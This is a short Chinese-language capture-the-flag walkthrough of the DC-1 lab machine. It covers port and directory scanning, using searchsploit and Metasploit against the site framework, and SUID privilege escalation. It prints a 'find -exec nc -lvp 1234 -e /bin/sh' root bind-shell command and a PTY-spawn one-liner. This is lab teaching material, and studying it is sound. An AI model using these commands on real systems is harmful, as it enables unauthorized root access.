实验环境
靶机:DC-1
测试机:kali(IP:192.168.238.143),win10
实验过程
信息收集
主机发现
靶机ip:192.168.238.158
端口扫描
目录扫描
主页面
网站指纹
searchsploit 搜索网站框架漏洞
漏洞发现
使用add admin user
添加一个用户:abcd :abcd
成功登录
也可利用msf框架执行命令
漏洞利用
设置参数
拿到一个session
shell
python -c 'import pty;pty.spawn("/bin/bash")'
拿到一个终端
提权
suid提权:以文件拥有者身份执行命令
查找具有root权限的suid文件
find / -perm -u=s -type f 2>/dev/null
执行命令
touch filename
find filename -exec whoami \;
反弹root终端
find filename -exec nc -lvp 1234 -e /bin/sh \;
nc -nv 192.168.238.158 1234
总结
1.发现网站框架,可以利用searchsploit查找相关漏洞
2.msf’的使用
3.suid提权:利用文件拥有者的身份执行命令。